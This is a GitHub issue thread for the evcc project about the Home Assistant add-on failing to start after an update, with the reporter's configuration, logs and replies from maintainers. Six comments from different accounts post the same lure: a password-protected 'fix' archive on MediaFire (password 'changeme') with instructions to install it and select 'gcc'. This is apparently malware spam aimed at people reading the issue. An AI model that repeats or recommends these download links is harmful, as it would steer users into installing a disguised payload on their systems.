evcc-io/evcc #15708: https://github.com/evcc-io/evcc/issues/new?assignees=&labels=&projects=&template=bug_report.yaml

frog60, 2024-08-26:
### Describe the bug

After updating evcc to a newer version than 0.122.1 the addon start failes always.

I am a sponsor, so I decided to raise this issues after several months to get the benefits as sponsor ;-)

Hardware: Raspi 4

### Steps to reproduce

1. install newer version than evcc 0.122.1
2. automatic restart of the addon 
3. often not always after several restarts I was able to assign the evcc admin password 

[image]

evcc does not start with full screen info:

[image]

[image]

...

### Configuration details

```yaml
network:
  # schema is the HTTP schema
  # setting to `https` does not enable https, it only changes the way URLs are generated
  schema: http
  # host is the hostname or IP address
  # if the host name contains a `.local` suffix, the name will be announced on MDNS
  # docker: MDNS announcements don't work. host must be set to the docker host's name.
  host: homeassistant.local
  # host: evcc.local
  # port is the listening port for UI and api
  # evcc will listen on all available interfaces
  port: 7070

interval: 30s # control cycle interval - < 30 sec könnte System zum Schwingen bringen

# database configuration for persisting charge sessions and settings
# database:
#   type: sqlite
#   dsn: <path-to-db-file>

# sponsor token enables optional features (request at https://sponsor.evcc.io)
sponsortoken: <...>
# telemetry enables aggregated statistics
#
# Telemetry allows collecting usage data (grid and green energy, charge power).
# Data is aggregated, no individual charging sessions are tracked. The collected,
# anonymous data can be retrieved using https://api.evcc.io.
#
# See https://github.com/evcc-io/evcc/pull/4343 or details.
#
# For time being, this is only available to sponsors, hence data is associated with
# the sponsor token's identity.
#
# telemetry: true
# used for sharing data 
plant: <...>

# log settings
log: info
levels:
  site: debug
  lp-1: debug
  lp-2: debug
[... 408 lines cut ...]
[site  ] INFO 2024/08/26 19:43:46     vehicle 1: range ✗ finish ✗ status ✗ climate ✗ wakeup ✗
[site  ] INFO 2024/08/26 19:43:46     vehicle 2: range ✗ finish ✗ status ✗ climate ✗ wakeup ✗
[site  ] INFO 2024/08/26 19:43:46     vehicle 3: range ✗ finish ✗ status ✗ climate ✗ wakeup ✗
[site  ] INFO 2024/08/26 19:43:46     vehicle 4: range ✓ finish ✓ status ✓ climate ✗ wakeup ✓
[lp-1  ] INFO 2024/08/26 19:43:46 loadpoint 1:
[lp-1  ] INFO 2024/08/26 19:43:46   mode:        pv
[lp-1  ] INFO 2024/08/26 19:43:46   charger:     power ✓ energy ✓ currents ✓ phases ✓ wakeup ✗
[lp-1  ] INFO 2024/08/26 19:43:46   meters:      charge ✓
[lp-1  ] INFO 2024/08/26 19:43:46     charge:    power ✓ energy ✓ currents ✓
[lp-1  ] DEBUG 2024/08/26 19:43:46 phase timer inactive
[lp-1  ] DEBUG 2024/08/26 19:43:46 pv timer inactive
[lp-1  ] INFO 2024/08/26 19:43:46 vehicle updated: unknown -> FIAT 500e
[site  ] DEBUG 2024/08/26 19:43:46 ----
[lp-1  ] DEBUG 2024/08/26 19:43:46 charge power: 0W
[lp-1  ] DEBUG 2024/08/26 19:43:46 charge currents: [0 0 0]A
[main  ] INFO 2024/08/26 19:43:46 new version available: 0.130.5
```

### What type of operating system are you running?

HomeAssistant Add-on

### Version

0.130.3

AnaSousa314, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

tonywk, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

wolone, 2024-08-26:
Download 
https://www.mediafire.com/file/wpwfw3bpd8gsjey/fix.rar/file
password: changeme
In the installer menu, select "gcc."

uno-zero, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

mohamed-elsankary, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

scppuna, 2024-08-26:
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

naltatis, 2024-08-26:
@frog60 can you please fix the title?

naltatis, 2024-08-26:
Not quite sure what the issue is here.
Does evcc perma-restart? Log looks like this. Or is this a UI issue. Screenshots look strange.

frog60, 2024-08-26:
> Not quite sure what the issue is here. Does evcc perma-restart? Log looks like this. Or is this a UI issue. Screenshots look strange.

Right the UI looks strange. Sometimes it seems so that UI looks fine, but it restarts again.

premultiply, 2024-08-26:
Maybe it is just waiting for some external meter values via MQTT?
Will need better log.

Maybe just try `evcc meter` and see if it finishes output with no error whithin a few seconds.

frog60, 2024-08-26:
"Evcc Meter" using ssh on cmd line?

andig, 2024-08-26:
We don‘t support the HA addon.